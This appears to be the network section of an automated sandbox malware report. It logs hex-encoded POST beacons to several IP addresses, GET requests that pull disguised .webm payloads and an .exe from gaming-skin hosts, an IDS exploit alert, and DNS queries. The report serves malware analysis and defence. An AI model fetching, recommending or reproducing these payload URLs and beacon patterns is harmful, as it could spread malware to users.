dd 53 2c b0 2d 62 43 4c 26 ed 9f 64 ac dc 72 b2 75 16 d9 57 ac 4b 20 8c 40 f9 4e aa d0 Data Ascii: X&'dFJ[Bg} Cr*u/F!Uw)V~wq$]C3%qRT6'W~G^6bqusW{jleSLm~:^U-'#Ya):_q@ZTH](SLt>qTG.%V }G$+c86y.F|2^ji8b7 b(vo]n<@OS,-bCL&druWK @N
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 116.132.218.191:80Content-type: application/octet-streamContent-Length: 252Connection: Keep-AliveData Raw: 3d 00 00 00 01 00 00 00 f0 00 00 00 e8 77 c7 8b 4a 2e 9d c0 e6 9f 60 9d 1a 49 b4 ea 99 de eb fb ac 60 4f ba d0 1a e1 3d 44 c5 0f 22 e8 53 5f 6f 59 e3 a8 03 2e f3 4e 36 27 e0 af fd 5b 86 33 00 92 ee d9 2a 21 4c 98 40 60 df 80 9b 04 69 a7 fe 77 e0 5c 89 8b 51 78 a6 58 6a 9d 85 00 3a 3f 45 62 52 6e 70 68 bb fa 16 76 26 db c8 84 6b 09 63 2f 91 12 1e ce 53 d6 88 ce 77 b1 a8 de f9 35 dc 8a c3 47 b4 10 55 bd b9 19 cf 35 ba a6 a9 c1 4b 4c ef d4 3f a4 78 8a 6f 9b 6e 58 bf a3 69 d6 ab fb dd 3d f4 33 0b 39 45 58 2a b6 9f 79 5b 53 fc dc 04 0d 6b 8f 83 ae d5 05 92 19 55 88 1b bd 10 9d 8f 6b 05 e3 98 6a ef 10 4f 52 74 40 0c cb 58 61 97 82 a8 bb a4 df b1 0b ed ac 71 a0 3e ff d6 6a 6b 95 54 9e d7 05 47 28 85 c5 9c c4 67 09 ff 61 66 95 b2 ac 01 48 46 f3 ae 68 71 Data Ascii: =wJ.`I`O=D"S_oY.N6'[3*!L@`iw\QxXj:?EbRnphv&kc/Sw5GU5KL?xonXi=39EX*y[SkUkjORt@Xaq>jkTG(gafHFhq
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 116.132.218.191:80Content-type: application/octet-streamContent-Length: 124Connection: Keep-AliveData Raw: 3d 00 00 00 0d 00 00 00 70 00 00 00 6b 7f 41 2d e6 83 23 fb fc 57 f4 cf e4 92 fa e1 fd 32 0c 19 96 52 8a 0f 63 ca 20 c8 79 17 ee 98 0e 40 b9 8c 5a 67 dd 84 99 cf ae b6 46 6d c5 fc bc 07 01 91 db f8 b8 3b 61 f9 19 a0 e2 84 ff d2 c5 77 90 18 79 36 f9 c9 0c 74 f2 dc ad 5e 00 db fc 13 3a 64 99 2a f3 d8 e1 c1 6c 39 81 9b 70 77 2a 5a 90 5c 31 f9 45 5e 94 1b 78 2a 0c ae 5a 51 Data Ascii: =pkA-#W2Rc y@ZgFm;awy6t^:d*l9pw*Z\1E^x*ZQ
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 116.132.218.191:80Content-type: application/octet-streamContent-Length: 560Connection: Keep-AliveData Raw: 88 58 03 26 10 27 00 00 80 00 00 00 80 64 46 4a a0 ef b0 5b 42 16 67 ec 89 14 7d 20 c7 43 ff 93 72 2a 75 9e f5 cd dd af 97 2f 46 21 c9 a4 a7 55 77 a2 29 02 0f 06 56 ba 7e 77 15 82 71 cf f4 b6 8e eb 24 1c 5d 43 e6 9c 0c 33 0e 87 25 d1 e3 f1 d4 d0 71 ed c8 52 54 a2 36 d0 d7 27 80 bd 1b ce 91 a8 c0 93 18 e8 ff ee 08 1c 57 af 7e 47 ca ea fd 5e dd 0f af 09 c7 36 e3 62 bb 82 c3 71 97 75 90 73 57 c5 7b ef b9 cc f0 a6 81 a1 a0 01 00 00 85 94 fb 93 84 79 42 03 da 7f ce bd 66 ea 6f cb 05 8c 3d 49 7f 58 34 88 32 f3 80 9a 7b 45 0d 23 5b aa 22 0a f2 b0 31 23 02 ae 49 f9 8d a2 67 6c 0d 79 8f 9d 4c 08 15 26 1a 42 e1 41 ad 0a f1 8f ba 7f c3 96 6d 7c 4a 99 38 55 f7 d3 c9 76 50 03 2c 52 e3 a5 f3 49 da 8d 9d d6 bc 7f d2 fe 0b 32 7b 3b 3c 2f 87 a4 7c 8e 06 95 ad 52 73 4d a1 28 0e 2e 0d 62 50 4e 86 1e 12 55 1d 26 55 13 13 29 47 98 4e f4 15 fb 8f d7 8b 14 2b e8 9e 7c 56 e8 57 2b 6b 2a 25 1e c0 fd 4e 8a 3e 41 73 15 77 fd 58 b1 c2 a0 ab 02 b9 54 5d 09 dd cb c8 51 c2 2f 64 b6 74 4f 83 0f 23 6c 5a 71 e9 45 a8 0a 4d f6 36 06 66 e0 42 53 9f ff 65 31 3d 50 d7 4b 3e 66 cb 74 fd 4d a3 bb 14 51 2a 66 25 c6 71 2c a0 d5 b6 51 b7 b9 3c 85 ff 04 1c 0b 1f 41 13 ed 8e 73 8a 4a ce ef 2f 4a 64 2f b4 12 7a 5b 5f de 56 35 52 a3 e2 b8 4c 56 22 54 3b bf f3 25 17 cd b8 b0 91 7c 9c c2 b4 a5 9f 52 46 9f 9a 8e 99 36 1b 79 95 46 7d 8e 0f 3f a3 5e 52 a7 13 c6 e5 ac 8b 3f 8f 51 f3 f6 89 d3 21 32 81 2a e3 36 f9 a5 01 97 b6 f6 f4 85 30 3c d1 46 a4 a4 e0 3e b2 db ec 2b 01 99 90 9a 6f 4b 57 39 b5 66 27 54 5d 08 99 fb 8c 32 4f ac 1b 4c 15 d5 7b fd a7 e2 cf 0a ec 7b 83 46 c0 42 6f 54 0f 4d 16 64 1c 0b 39 97 2b c2 d4 f2 5d b5 9f b1 e1 9a 38 5c a5 ba d9 65 35 7d 12 0b ac db c2 59 3f 51 04 49 3f 96 f6 5b 3c 6c Data Ascii: X&'dFJ[Bg} Cr*u/F!Uw)V~wq$]C3%qRT6'W~G^6bqusW{yBfo=IX42{E#["1#IglyL&BAm|J8UvP,RI2{;</|RsM(.bPNU&U)GN+|VW+k*%N>AswXT]Q/dtO#lZqEM6fBSe1=PK>ftMQ*f%q,Q<AsJ/Jd/z[_V5RLV"T;%|RF6yF}?^R?Q!2*60<F>+oKW9f'T]2OL{{FBoTMd9+]8\e5}Y?QI?[<l
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 140.206.225.136:80Content-type: application/octet-streamContent-Length: 204Connection: Keep-AliveData Raw: 3d 00 00 00 0b 00 00 00 c0 00 00 00 77 18 96 29 dc 59 a4 83 2d e1 e1 fa 33 61 69 df a1 7f 53 22 8a 4d e4 24 0e 3e f4 6d 4e 7e 27 0b cb f2 2d 75 66 e5 c2 61 50 43 4b ec 2b 33 a4 bf ef 0b 78 95 5a 97 0a c2 03 02 e5 ee e0 bb ae 5a d0 9b 97 4e 02 26 d8 f9 b1 17 6b a9 c3 b0 23 4e e1 f7 9f 0c 03 0c 53 06 57 60 1b 28 6e a1 f7 4e e1 f7 9f 0c 03 0c 53 06 57 60 1b 28 6e a1 f7 4e e1 f7 9f 0c 03 0c 53 06 57 60 1b 28 6e a1 f7 4e 9c 7a 57 49 a2 1b d1 10 93 92 a1 f4 b1 98 eb 24 e6 03 a7 0c 1a db 10 fc 76 33 ba 7b 26 0f da 33 80 be 53 53 ae 02 b5 46 d9 b2 8d b1 89 91 aa 55 38 8f 4d 22 11 68 c1 ca 57 f4 f1 d4 50 19 f5 05 Data Ascii: =w)Y-3aiS"M$>mN~'-ufaPCK+3xZZN&k#NSW`(nNSW`(nNSW`(nNzWI$v3{&3SSFU8M"hWP
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 116.132.219.22:80Content-type: application/octet-streamContent-Length: 192Connection: Keep-AliveData Raw: 88 58 03 26 40 9c 00 00 80 00 00 00 61 cb b8 9a 46 46 6e d1 c4 7d da aa 15 c9 6e 46 19 8b 01 28 1b 43 00 c6 01 96 b1 93 80 f7 8a e3 b2 4e 53 88 4a 60 d0 c6 2f e9 83 72 26 65 f1 54 76 15 83 e3 9d 94 bf 14 55 15 c3 19 18 58 04 88 7d fc b1 c3 b1 93 28 66 b0 c9 69 f5 a9 6c 1a 3c ab e6 c2 8d e3 ab b6 d6 7d b7 d6 87 3a 7a 63 e6 f0 89 08 eb 2d ee 36 fa ca 24 ff fe 69 90 b8 85 ef 2d b7 1a 22 26 e6 ce d3 7a 78 b5 d5 de 4d 1e 30 00 00 00 b5 07 5f 07 48 74 c2 0f dc 24 0d 01 a7 1b 18 78 d0 d3 af 01 3d e5 19 70 26 1f a6 42 7e d7 bd 7a 34 ab ac 84 b5 bf 34 c6 50 fa 93 fc f8 62 2e 3e Data Ascii: X&@aFFn}nF(CNSJ`/r&eTvUX}(fil<}:zc-6$i-"&zxM0_Ht$x=p&B~z44Pb.>
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 140.206.225.136:80Content-type: application/octet-streamContent-Length: 656Connection: Keep-AliveData Raw: 88 58 03 26 20 4e 00 00 80 00 00 00 6f 21 a8 60 85 32 73 1e 4a 11 cf 48 7d 59 02 3d dd e3 7c 95 ba 6e 51 c8 5e df b3 14 ac 79 b0 04 64 36 b1 1f 70 6b a8 a4 87 fa 0a bb ea 05 76 ac 6e 59 5a 74 3f ec aa fe 17 59 67 be c0 80 01 94 63 85 b2 41 1a f9 44 5b a4 f9 92 59 d7 0c 47 2a fd a0 0d 58 b2 33 fa 93 c9 b7 24 1c 87 62 dd 6e 30 fa 2e b8 46 95 d5 f1 f4 81 82 71 0e 53 27 a1 d1 0a 01 ff 28 59 45 7e 89 03 99 63 22 78 34 a3 00 02 00 00 29 5a 01 65 ae f9 88 77 85 ac 43 c6 1c ce dc 9a 54 53 b3 23 9b be 79 71 74 9f 74 e3 20 03 2a c2 e8 99 74 b6 e4 f8 be 20 c0 83 44 0f b6 8a c1 0d 37 4a 03 99 34 7f bd 6e 05 89 b0 d7 c0 86 03 b6 d3 eb c5 2f ea e0 e2 24 5d bf 44 92 a7 8c 49 2f 74 92 27 ba ad 5e 04 9e 52 75 29 9f b3 14 2a 67 2f 5c 5e e3 4b c2 e1 55 d0 8b d9 79 56 64 31 55 f7 38 7d 7f 5b 41 c9 05 28 29 18 3a d8 6a 84 1f 66 1e 9f d9 e9 12 88 dc f0 f3 9c 2f 50 07 0a f8 f3 7e 5c ab 45 a8 56 0f f4 76 1c 61 d0 cb f1 e0 29 8b 84 6f 00 30 84 63 31 f5 cf b7 8d 05 8c 9c 9f 74 f1 25 43 f4 86 fb b5 6b 1c c6 1d 82 5f 54 9a 7d 16 47 e3 2a 37 6a 07 3d cd 75 43 46 d3 4c cd 94 e5 13 8c 8e 23 f1 5d d0 1f 16 e3 ce 89 3c 67 54 85 f6 6c 49 52 98 87 39 b0 03 5d 78 5e 88 a0 01 88 7d 06 6f 96 d0 dc 3c 66 29 fd c6 17 43 16 79 21 66 7a 36 65 a7 aa ba 7a 68 b5 f0 1c 0b b2 93 1e bb e8 e0 78 c7 f0 d6 d0 c3 10 21 3c c2 80 94 ad 50 32 4c d9 92 5e 07 ff 6b f1 91 d9 99 94 57 6d 23 b6 ad e7 91 01 16 32 06 b1 6b c2 62 44 d9 fc 75 01 46 78 d1 3d 1b a6 6b 7b 67 5e a6 35 2c 82 76 d7 47 97 c7 1f 65 16 58 51 06 0b 48 a1 ee 06 ce 7a 0b 23 4d cb bc 06 45 17 e1 c2 0e 4e 52 40 b8 34 db 18 0e fa 65 81 05 02 80 2f a0 58 7c 63 b0 07 59 49 73 ca 8a 87 3e d9 dd 80 1c a5 94 dc 62 73 8b 02 10 73 12 37 b6 8a be e2 35 51 9e 9b 06 a4 33 8b 62 f7 79 86 62 27 e4 8d 15 09 2f 20 66 bb 9e b1 a5 8d fb 6e 25 23 a0 f9 0b d4 a1 bc e8 5f 8b cb 2b be df b5 2a e4 58 0f a0 75 26 88 7b b2 e7 87 de d0 38 8f 17 77 42 c0 6a d7 52 28 e5 15 a4 4e 71 79 18 77 c5 56 64 46 6b 09 f5 20 a1 b8 5b 78 35 16 d8 cb cf 8d a1 83 0f Data Ascii: X& No!`2sJH}Y=|nQ^yd6pkvnYZt?YgcAD[YG*X3$bn0.FqS'(YE~c"x4)ZewCTS#yqtt *t D7J4n/$]DI/t'^Ru)*g/\^KUyVd1U8}[A():jf/P~\EVva)o0c1t%Ck_T}G*7j=uCFL#]<gTlIR9]x^}o<f)Cy!fz6ezhx!<P2L^kWm#2kbDuFx=k{g^5,vGeXQHz#MENR@4e/X|cYIs>bss75Q3byb'/ fn%#_+*Xu&{8wBjR(NqywVdFk [x5
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
Source: Joe Sandbox ViewJA3 fingerprint: fc54e0d16d9764783542f0146a98b300
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.10:49763
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.10:57357
Source: global trafficHTTP traffic detected: GET /storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQxN3dJdEF5Q0tv&un=D520D8ADC384964E306AF1AA3DEEAF44A0596F6CB5C8600FE560D3DA9892C32B&dom=D930&rate=0&txType=0 HTTP/1.1Accept: */*Accept-Language: en-CHCache-Control: no-cacheConnection: Keep-AliveHost: download6.mcloud.139.comPragma: no-cacheReferer: https://download6.mcloud.139.com/storageWeb/servletUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Source: global trafficHTTP traffic detected: GET /file/350f2ed90l674df0a13399cb294b0863?bkt=en-82d2bca2fdceac3fabfb1ed2452331aa4ea92c5a28680a39063f76c7d20de64ee244b6b41ae7090f&fid=1103614021113-16051585-129100381070572&time=1730907642&sign=FDTAXUbGERQlBHSKfWqi-DCb740ccc5511e5e8fedcff06b081203-r6WwRtBhYnf79bsQAZEomL42rw0%3D&to=75&size=5941360&sta_dx=5941360&sta_cs=317&sta_ft=webm&sta_ct=3&sta_mt=3&fm2=MH%2CYangquan%2CAnywhere%2C%2CNone%2Cany&ctime=1729728590&mtime=1729728590&dt3=24&resv0=-1&resv1=0&resv2=rlim&resv3=5&resv4=5941360&vuk=1103614021113&iv=0&vl=1&htype=&randtype=&tkbind_id=0&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=en-3cf4596bf0ad06de52fd9a80914cd67c97711c5c404e764460b4925d0024dd1473b613b062ffe5bb&expires=8h&rt=pr&r=569376143&mlogid=7212657344168653326&vbdid=-&fin=SLCoreAssets254_2.webm&fn=SLCoreAssets254_2.webm&err_ver=1.0&rtype=1&clienttype=70&dp-logid=7212657344168653326&dp-callid=0.1.1&hps=1&tsl=0&csl=0&fsl=-1&csign=pnawazyXxvhDSfXVs1mpjf37Nwk%3D&so=0&ut=6&uter=4&serv=1&uc=3871693838&ti=39965399e74cce84af8a76d067ba343c3eb28ff7aebe9176&hflag=30&from_type=1&adg=n&reqlabel=16051585_d_831b808e43ac56a7fd3c1706a38d91ab_-1_769817cf1ab77604e3ebedabfe8c530f&fpath=_pcs_.appdata%2Fyoua%2Fweb&by=themis HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Cache-Control: no-cacheHost: bjbgp01.baidupcs.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /SLVersionConfig.json HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /SLVersionConfig.json HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /SLServerConfig.json HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/PanAlistPhoto/SLBox241019_2.webm HTTP/1.1Accept: */*Accept-Language: en-CHCache-Control: no-cacheConnection: Keep-AliveHost: skinx.x1.lolgezi.ccPragma: no-cacheReferer: http://skinx.x1.lolgezi.cc/d/PanAlistPhotoUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /SLServerConfig.json HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/PanAlist139Yun/SLBox/%E8%B5%84%E6%BA%90%E4%BF%AE%E5%A4%8D%E5%8C%85_241019_1.exe HTTP/1.1Accept: */*Accept-Language: en-CHCache-Control: no-cacheConnection: Keep-AliveHost: skinx.x1.lolgezi.ccPragma: no-cacheReferer: http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBoxUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /SLAppAssets101.to HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/PanAlistPhoto/SLCoreAssets254_2.webm HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: skinx.x1.lolgezi.ccCache-Control: no-cache
Source: unknownHTTPS traffic detected: 113.200.1.7:443 -> 192.168.2.10:57286 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57312 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57337 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57338 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57330 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57336 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57331 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57334 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57333 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57332 version: TLS 1.0
Source: unknownHTTPS traffic detected: 36.138.50.131:443 -> 192.168.2.10:57335 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_10051530 WSARecvFrom,WSAGetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,14_2_10051530
Source: global trafficHTTP traffic detected: GET /storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQxN3dJdEF5Q0tv&un=D520D8ADC384964E306AF1AA3DEEAF44A0596F6CB5C8600FE560D3DA9892C32B&dom=D930&rate=0&txType=0 HTTP/1.1Accept: */*Accept-Language: en-CHCache-Control: no-cacheConnection: Keep-AliveHost: download6.mcloud.139.comPragma: no-cacheReferer: https://download6.mcloud.139.com/storageWeb/servletUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Source: global trafficHTTP traffic detected: GET /file/350f2ed90l674df0a13399cb294b0863?bkt=en-82d2bca2fdceac3fabfb1ed2452331aa4ea92c5a28680a39063f76c7d20de64ee244b6b41ae7090f&fid=1103614021113-16051585-129100381070572&time=1730907642&sign=FDTAXUbGERQlBHSKfWqi-DCb740ccc5511e5e8fedcff06b081203-r6WwRtBhYnf79bsQAZEomL42rw0%3D&to=75&size=5941360&sta_dx=5941360&sta_cs=317&sta_ft=webm&sta_ct=3&sta_mt=3&fm2=MH%2CYangquan%2CAnywhere%2C%2CNone%2Cany&ctime=1729728590&mtime=1729728590&dt3=24&resv0=-1&resv1=0&resv2=rlim&resv3=5&resv4=5941360&vuk=1103614021113&iv=0&vl=1&htype=&randtype=&tkbind_id=0&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=en-3cf4596bf0ad06de52fd9a80914cd67c97711c5c404e764460b4925d0024dd1473b613b062ffe5bb&expires=8h&rt=pr&r=569376143&mlogid=7212657344168653326&vbdid=-&fin=SLCoreAssets254_2.webm&fn=SLCoreAssets254_2.webm&err_ver=1.0&rtype=1&clienttype=70&dp-logid=7212657344168653326&dp-callid=0.1.1&hps=1&tsl=0&csl=0&fsl=-1&csign=pnawazyXxvhDSfXVs1mpjf37Nwk%3D&so=0&ut=6&uter=4&serv=1&uc=3871693838&ti=39965399e74cce84af8a76d067ba343c3eb28ff7aebe9176&hflag=30&from_type=1&adg=n&reqlabel=16051585_d_831b808e43ac56a7fd3c1706a38d91ab_-1_769817cf1ab77604e3ebedabfe8c530f&fpath=_pcs_.appdata%2Fyoua%2Fweb&by=themis HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Cache-Control: no-cacheHost: bjbgp01.baidupcs.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /SLVersionConfig.json HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /SLVersionConfig.json HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /SLServerConfig.json HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/PanAlistPhoto/SLBox241019_2.webm HTTP/1.1Accept: */*Accept-Language: en-CHCache-Control: no-cacheConnection: Keep-AliveHost: skinx.x1.lolgezi.ccPragma: no-cacheReferer: http://skinx.x1.lolgezi.cc/d/PanAlistPhotoUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /SLServerConfig.json HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/PanAlist139Yun/SLBox/%E8%B5%84%E6%BA%90%E4%BF%AE%E5%A4%8D%E5%8C%85_241019_1.exe HTTP/1.1Accept: */*Accept-Language: en-CHCache-Control: no-cacheConnection: Keep-AliveHost: skinx.x1.lolgezi.ccPragma: no-cacheReferer: http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBoxUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /SLAppAssets101.to HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: sl.gzskins.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/PanAlistPhoto/SLCoreAssets254_2.webm HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: skinx.x1.lolgezi.ccCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: os.ljq520.top
Source: global trafficDNS traffic detected: DNS query: sl.gzskins.com
Source: global trafficDNS traffic detected: DNS query: hub5pn.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: hub5pnc.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: hub5u.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: hub5c.hz.sandai.net
